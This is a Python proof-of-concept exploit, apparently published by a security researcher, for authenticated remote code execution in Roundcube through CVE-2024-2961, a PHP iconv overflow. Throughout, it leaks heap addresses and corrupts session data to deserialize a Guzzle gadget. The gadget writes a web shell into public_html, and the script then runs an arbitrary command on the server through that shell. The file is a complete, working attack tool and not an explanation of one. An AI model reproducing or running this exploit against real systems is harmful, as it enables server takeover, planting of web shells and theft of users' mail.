#!/usr/bin/env python3 # # CNEXT: Roundcube authenticated RCE (CVE-2024-2961) # Date: 2024-06-17 # Author: Charles FOL @cfreal_ (LEXFO/AMBIONICS) # # INFORMATIONS # # Tested on Roundcube 1.6.6, PHP 8.3. This is merely a POC. If it fails, you'll have to # debug it yourself. Maybe the target is patched, or my leak technique does not work # for the Roundcube/PHP version of your target. # from dataclasses import dataclass, field from ten import * from pwn import p64, p32, u64 HEAP_SIZE = 2 * 1024**2 class Buffer: def __init__(self, size: int, byte: bytes = b"\x00") -> None: self.array = bytearray(byte * size) def __setitem__(self, position: int, value: bytes) -> None: end = position + len(value) if end > len(self.array): raise ValueError( f"Cannot write value of size {len(value)} at position {position} in buffer of size {len(self.array)}" ) self.array[position : position + len(value)] = value def __bytes__(self) -> bytes: return bytes(self.array) class Data: data: list[tuple[str, bytes]] def __init__(self, form: Form, **kwargs) -> None: self.data = [ (key, to_bytes(value)) for key, value in (form.data | kwargs).items() ] def add(self, key: str, value: bytes) -> None: self.data.append((key, to_bytes(value))) def marker(self, key: str, size: int, c: bytes = b"M") -> None: marker = f"M{key}".encode() marker = marker + string(size - len(marker), c=c) self.add(key, marker) def delete(self, key: str) -> None: self.add(key, b"") def encode(self, value) -> bytes: return tf.qs.encode_all(value).encode() def min_encode(self, value: bytes) -> bytes: """Perform the minimum URL-encoding for value.""" value = value.replace(b"+", b"%2B") value = value.replace(b"&", b"%26") return value def __bytes__(self) -> bytes: data = b"&".join( key.encode() + b"=" + self.min_encode(value) for key, value in self.data ) # data = data + b"&" # data = data.ljust(1024*1024, b"x") return data @entry @arg("url", "URL of target") @arg("username", "Username") @arg("password", "Password") @arg("command", "Command to run") @dataclass class Exploit: """Roundcube authenticated RCE exploit using CVE-2024-2961 (CNEXT).""" url: str """URL of the target.""" username: str """Username to authenticate with.""" password: str """Password to authenticate with.""" command: str """Command to run on the target.""" session: ScopedSession = field(init=False) form: Form = field(init=False) @inform("Authenticating", "Login OK", "Failed to authenticate", ko_exit=True) def login(self) -> bool: response = self.session.get("/") form = response.form(id="login-form") response = form.update(_user=self.username, _pass=self.password).submit() response.expect(302, 401) return response.code(302) @inform("Getting compose form...") def get_form(self) -> Form: response = self.session.get("/?_task=mail&_mbox=INBOX&_action=compose") response.expect(302) response = response.follow_redirect() self.form = response.form(action="/?_task=mail") def submit(self, data: bytes) -> Response: return self.session.post( "/?_task=mail&_framed=1", data=bytes(data), headers={"Content-Type": "application/x-www-form-urlencoded"}, ) @inform("Leaking heap...") def get_leak(self) -> None: """We use chunks of size 0x800 to perform the exploit. The size is not trivial: sprintf() returns chunks multiple of 0x400, and we'll see why it is useful later on. The idea is to trigger the bug, and use it to make a chunk A of size 0x800 get allocated a little bit lower than expected, and overflow into the chunk B right under itself. We want to use A to overwrite B's zend_string header before it is displayed on the page to increase its size. The difficulty here is that we need B to be displayed RAW in the page - for instance, if json_encode() is called on B before it is displayed, it will discard some of the bytes of the leak, and make it less useful. To do so, I chose to play with the rcmail_output_html::get_js_commands() method, which allocates and concatenates a few strings (some that we control) before they get displayed. After the exploitation of the bug, we have FL[0x800]: D -> B -> C -> A', with A' sitting 0x4a bytes after A in memory To perform this magic trick we will make use of every input value and every string manipulation calls such as json_encode(), sprintf(), and the concatenations that happen in the function. Despite being ~80 lines long, this part was absolute hell. The leak is around 0x3000 bytes, so we can allocate something on the page right under to leak addresses. By creating and clearing a few 0x800 pointers using POST data, we make sure that the leak points very close to us. It actually points to the first L[1], so by substracting 0x800*2 we get to L[0], and at -0x800*6 we have V[0]. """ what = "heap" assert what in ("heap", "main") # _(27, 2048, 8, 4, x, y) \ NB_VICTIMS_PER_ALLOC = 4 NB_POSTS_PER_ALLOC = NB_VICTIMS_PER_ALLOC // 2 VICTIM_SIZE = 0x800 # 3072 # 29 VICTIM_SIZE_MIN = 0x700 + 1 # 2560 # 28 data = Data(self.form) data.add("_charset", b"ISO-2022-CN-EXT") # Overflow! data.add("_to", overflow_string(VICTIM_SIZE)) # unlock is too small for chunks of 0x800, but if you add one byte, it is not # anymore data.add("_unlock", unlock(VICTIM_SIZE_MIN - 1)) # Small pad for i in range(NB_POSTS_PER_ALLOC + 2): data.marker(f"PV[{i}]", VICTIM_SIZE_MIN, b"V") # Victims for i in range(NB_POSTS_PER_ALLOC): data.marker(f"V[{i}]", VICTIM_SIZE_MIN, b"\x00") match what: # We want to leak pointers to our chunks of the same size as the one used to # exploit, so we allocate 0x800 chunks and free them case "heap": # Leak pointers for i in range(NB_POSTS_PER_ALLOC): data.marker(f"L[{i}]", VICTIM_SIZE_MIN, b"\x00") # Create these so that the memory leak leaks their precise address data.delete(f"L") # This is legacy code: what is always `heap` now, but I keep it in case you # want to see the difference: here, we allocate arrays to be able to see # them in the heap case "main": for i in range(100): data.marker(f"A[{i}]", 0x38) data.delete("A") # Make the free list become: D B C A data.delete(f"V") # _cc and _bcc will get exploded by ",", and each email will be parsed one by # one. If one produces an error, it is stored and an error message is displayed # Otherwise, the list of every email separated by ", " is stored. # _cc: this value is the first invalid email, and it'll get stored in order to # be displayed in a json_encoded error message: # "Adresse courriel invalide : " # We use a value that makes the json_encode() to fit in a 0x800 chunk, as well # as the sprintf() that comes later on. error_email = string(0x650, b"o") + b"\x00" * 55 + b"abcdef" data.add("_cc", error_email) # _bcc: contains multiple emails # # Create a list of emails which, after being concatenated and stored by # email_input_format(), fit in a 0x800 chunk, thus padding the FL mail_list = "a@t.net, " mail_list = (mail_list + " " * 20) * (VICTIM_SIZE_MIN // len(mail_list)) mail_list = mail_list.encode() data.add("_bcc", mail_list) # Get our leak! response = self.submit(data) match = response.re.search( rb'parent.rcmail.iframe_loaded\((".*)abcdef","error",0\);\n}\n\n\n\n\n\n\n\n$', flags=re.S, ) assume(match, "Could not get leak") match = match.group(1) assume(len(match) > 0x00000E64, "Could not trigger leak") match what: case "heap": leak = u64(match[0x00001FA8:0x00001FB0]) msg_info(f"Leaked heap address: [b]{hex(leak)}") # Same: this is legacy code, but I keep it in case you want to see the idea case "main": leak = u64(match[0x000027D8:0x000027E0]) msg_success(f"Leaked [i]_zval_ptr_dtor[/] address: [b]{hex(leak)}") return leak @inform("Executing code...") def overwrite_session_preferences(self, heap: int) -> None: """Overwrite the session hashmap+bucket to point to create a fake `preferences` key-value that will be deserialized afterwards. """ VICTIM_SIZE = 0x400 VICTIM_SIZE_MIN = 0x380 + 1 data = Data(self.form) data.add("_charset", b"ISO-2022-CN-EXT") trigger = ( "A" * (VICTIM_SIZE - 0x100) + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA劄劄\n劄劄\n劄劄\n劄\n劄\n劄\n劄" ) data.add("_to", trigger) # data.add("_unlock", unlock(0x700)) HEAP_BASE_ADDR = heap & ~(HEAP_SIZE - 1) SESSION_BUCKETS_ADDR = HEAP_BASE_ADDR + 0xA2000 - 0x100 # Offset from our overwrite to the Bucket allocation OFF_WRITE = 0x280 # Number of entries in the array entries = 0x20 # Create a few chunks of size 0x400 which contain, at offset 0x48, an arbitrary # address, and free them. After we overwrite the LSB of the FL[0x400] pointer, # it'll point to said arbitrary address. for i in range(10): payload = bytearray(string(VICTIM_SIZE_MIN, b"\x00")) offset = 0x48 - 0x18 payload[offset : offset + 8] = p64(SESSION_BUCKETS_ADDR - OFF_WRITE - 0x18) data.add(f"A[{i}]", payload) data.delete("A") # We modify arData[0] and set its key to preferences. When the session gets # saved, PHP will extract the keys one by one from the session array, and then # use zend_hash_find() to find the corresponding value. We update the hashmap # so that when looking for the index in arData of preferences, 0x21 is returned. # 0x21 is the index of the fake bucket we created, which points to the fake # value (a serialized string) # The key/value pair therefore gets stored in the array. When we go on the index # afterwards, preferences gets deserialized (rcube_user.php:147) # Key of the session bucket that we want to change KEY = b"preferences" VALUE = qs.decode_bytes( """a:2:{i:7%3BO:31:"GuzzleHttp\Cookie\FileCookieJar":4:{s:36:"%00GuzzleHttp\Cookie\CookieJar%00cookies"%3Ba:1:{i:0%3BO:27:"GuzzleHttp\Cookie\SetCookie":1:{s:33:"%00GuzzleHttp\Cookie\SetCookie%00data"%3Ba:3:{s:7:"Expires"%3Bi:1%3Bs:7:"Discard"%3Bb:0%3Bs:5:"Value"%3Bs:30:""%3B}}}s:39:"%00GuzzleHttp\Cookie\CookieJar%00strictMode"%3BN%3Bs:41:"%00GuzzleHttp\Cookie\FileCookieJar%00filename"%3Bs:23:"./public_html/shell.php"%3Bs:52:"%00GuzzleHttp\Cookie\FileCookieJar%00storeSessionCookies"%3Bb:1%3B}i:7%3Bi:7%3B}""" ) # Its hash KEY_HASH = 0xC0C1E3149808DB17 # And its offset in the hashmap HASH_OFFSET = 0xFFFFFFFF & (KEY_HASH | 0xFFFFFFC0) HASH_OFFSET = 0xFFFFFFFF - HASH_OFFSET + 1 HASH_OFFSET = 0x40 - HASH_OFFSET BASE_ADDR = SESSION_BUCKETS_ADDR + 0x500 KEY_ADDR = BASE_ADDR + 0x40 VALUE_ADDR = BASE_ADDR + 0x270 # A fake index that actually points AFTER the Buckets[] in memory, right onto # our modified bucket in_string = 0 # The original (unmodified) hashmap hashmap = bytearray( bytes.fromhex( f""" ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 05 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 15 00 00 00 11 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0e 00 00 00 04 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 07 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 13 00 00 00 ff ff ff ff ff ff ff ff 12 00 00 00 0f 00 00 00 02 00 00 00 08 00 00 00 0a 00 00 00 ff ff ff ff 0d 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 14 00 00 00 0b 00 00 00 ff ff ff ff ff ff ff ff 06 00 00 00 09 00 00 00 ff ff ff ff ff ff ff ff 10 00 00 00 0c 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff """ ) ) # Change hash to make it point to the first bucket, that we have modified hashmap[HASH_OFFSET * 4 : HASH_OFFSET * 4 + 4] = p32(in_string) victim = Buffer(OFF_WRITE + 0x100 + 0x20, b"A") victim[OFF_WRITE] = hashmap # Fake bucket victim[OFF_WRITE + 0x100] = ( p64(VALUE_ADDR) # ZVAL ZVALUE + p32(6) + p32(0xFFFFFFFF) # ZVAL TYPE and NEXT + p64(KEY_HASH) # HASH + p64(KEY_ADDR) # KEY ) victim = bytes(victim) assert ( VICTIM_SIZE >= len(victim) + 0x18 + 1 >= VICTIM_SIZE_MIN ), f"{hex(len(victim) + 0x18 + 1)}" # _from addresses, separated by `;`, get through a list of modifications. The # two we use are the mime decoding (=?UTF-8?B??=) and then a trim() # base64-decode is nice because it allows us to have raw bytes in our payload # (bypass the charset conversion that happens first), but it will decode in a # buffer that has the same size as the base64 (for instance if b64 has size # 0xc00, the decoded string is allocated in a 0xc00 chunk as well). A few calls # deeper, our values are trim()ed however, which will cause a reallocation. # The trim() operations will therefore allocate the chunks def build_equal_payload(data: bytes) -> str: data = b" " * 1000 + data data = base64.encode(data) data = f"=?UTF-8?B?{data}?=" return data victim = build_equal_payload(victim) # our fake pointer points to a 0x500 chunk; when it gets freed, it'll be put in # the FL (and be ready to be allocated). We create other 0x500 allocs to protect # it protector = bytearray(string(0x500, b"P")) protector = build_equal_payload(protector) data.add("_from", ";".join([victim] * 30 + [protector] * 10)) # Create an array of 0x500 chunks separated by a hole # like A--B--C--D... # The buckets of $_SESSION will get allocated in one of the holes # TODO Reduce N probably n = 10 for i in range(n * 2): data.marker(f"B[{i}]", 0x500, b"X") data.delete("B") # We create chunks filled with 0x00, so that when we alter the FL to point # there, it does not break with successive allocations. # In addition, we include a fake key and value in there, that we can reference # in our modified bucket for i in range(n): padder = Buffer(string_size(0x500)) fake_key = Buffer(0x30) fake_key[0x00] = p32(100) + p32(6) # gc fake_key[0x08] = p64(KEY_HASH) # HASH fake_key[0x10] = p64(len(KEY)) # LEN fake_key[0x18] = KEY + b"\x00" fake_key = bytes(fake_key) fake_value = Buffer(0x280) fake_value[0x00] = p32(100) + p32(6) # gc fake_value[0x08] = p64(0) # HASH fake_value[0x10] = p64(len(VALUE)) # LEN fake_value[0x18] = VALUE + b"\x00" fake_value = bytes(fake_value) padder[0x028] = fake_key padder[0x258] = fake_value padder = bytes(padder) data.add(f"Z[{i}]", padder) data.add("_draft", "1") try: r = self.submit(data) except Exception: failure("Crash while dumping binary") if not r.code(500): msg_warning("No error, strangely") msg_success("Set session preferences, triggering!") response = self.session.get("/") command = "rm -rf shell.php; " + self.command command = base64.encode(command) command = f"""system(base64_decode('{command}'));""" response = self.session.post("/public_html/shell.php", {"x": command}) if response.code(200): msg_success("Command executed") elif response.code(404): failure("Payload was not deserialized") else: failure(f"Unexpected error: {response.status_code}") def run(self) -> None: self.session = ScopedSession(self.url) # Initial request to setup heap IDK self.session.get("/") # self.session.burp() self.login() self.get_form() heap = self.get_leak() self.overwrite_session_preferences(heap) self.session.close() def string_size(n: int) -> int: return n - 24 - 1 def string(n: int, c: bytes = b"A") -> bytes: return c * string_size(n) def overflow_string(n: int) -> bytes: prefix = b"\xe2\x84\x96\xe2\x84\x96\xe2\x84\x96\n" * 11 suffix = b"\xe3\xb4\xbd" fake_mail = b"F" * 0x600 + b"," added_size = n - 32 - len(prefix + suffix + fake_mail) value = fake_mail + string(added_size, b"O") + prefix + suffix return value def unlock(size: int) -> bytes: """ pwndbg> hex args[0]->value.str +0000 0x7f3e803d6400 02 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 │........│........│ +0010 0x7f3e803d6410 58 03 00 00 00 00 00 00 69 66 20 28 77 69 6e 64 │X.......│if.(wind│ +0020 0x7f3e803d6420 6f 77 2e 70 61 72 65 6e 74 20 26 26 20 70 61 72 │ow.paren│t.&&.par│ +0030 0x7f3e803d6430 65 6e 74 2e 72 63 6d 61 69 6c 29 20 70 61 72 65 │ent.rcma│il).pare│ +0040 0x7f3e803d6440 6e 74 2e 72 63 6d 61 69 6c 2e 69 66 72 61 6d 65 │nt.rcmai│l.iframe│ +0050 0x7f3e803d6450 5f 6c 6f 61 64 65 64 28 22 55 55 55 55 55 55 55 │_loaded(│"UUUUUUU│ ... +0050 0x7f3e803d6760 55 55 55 55 55 55 55 55 55 55 55 55 22 29 3b 0a │UUUUUUUU│UUUU");.│ +0060 0x7f3e803d6770 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 │........│........│ """ return string(size - 70, b"U") Exploit()